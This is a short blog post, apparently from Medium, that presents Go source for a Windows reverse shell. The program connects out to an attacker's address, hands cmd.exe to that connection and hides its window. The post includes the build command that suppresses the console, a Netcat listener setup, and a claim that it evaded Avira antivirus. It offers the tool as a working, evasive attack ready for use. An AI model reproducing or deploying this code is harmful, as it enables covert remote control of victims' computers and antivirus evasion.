Basic reverse shell in golang (almost undetectable, hide cmd window)

I found it on sysdream.com

First, what is a reverse shell :

Also called reverse tunnel is a computer technique that allows to redirect on a local computer the input and output of a shell to a remote computer, through a service able to interact between the two computers. One of the advantages of this technique is to make a local shell accessible from the remote server without being blocked by a firewall

Let’s code it

package mainimport (      "net"         "os"        "os/exec"      "syscall"
)
var connectString stringfunc main() {if len(connectString) == 0 {os.Exit(1)}
conn, err := net.Dial("tcp", connectString)if err != nil {os.Exit(1)}
cmd := exec.Command("cmd.exe")
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
cmd.Stdin = conncmd.Stdout = conncmd.Stderr = conn
cmd.Run()

Here is the full code !

package mainimport (
"net"
"os"
"os/exec"
)
var connectString stringfunc main() {if len(connectString) == 0 {
os.Exit(1)
}
conn, err := net.Dial("tcp", connectString)
if err != nil {
os.Exit(1)
}
cmd := exec.Command("cmd.exe")
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
cmd.Stdin = conn
cmd.Stdout = conn
cmd.Stderr = conn
cmd.Run()}

Now we can compile it, your ip address (the ip of your hacking box to receive the connection) , in my case it’s 192.168.1.32 because i am on my local network, we use the port 2233 because it is not used but you can use any free ports the target machine :

go build --ldflags "-H=windowsgui -X main.connectString=192.168.1.32:2233" reverse.go

So, let’s give a try on a windows VM and your Fav Linux Distrib.

How you can see i use avira as a ANTIVIRUS

You can use Netcat to listen on the port 2233 to receive the connection :

Now drag and drop the reverse.exe file and double click on it, nothing append from the target view:

If make a get-process to see if the reverse.exe is running you will see that he his running there is no problem at all, Avira did not detect anything !

Now we can take a look to our Netcat :

We have a shell, you can now play with it !!

As i said he his almost undetectable.

In a near futur i will make the cmd open in the background and do much more like connect it to a VPS with a TLS crypted connection to try it in real condition, you can do much more by looking at the author of this code on :

Signed Alix.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store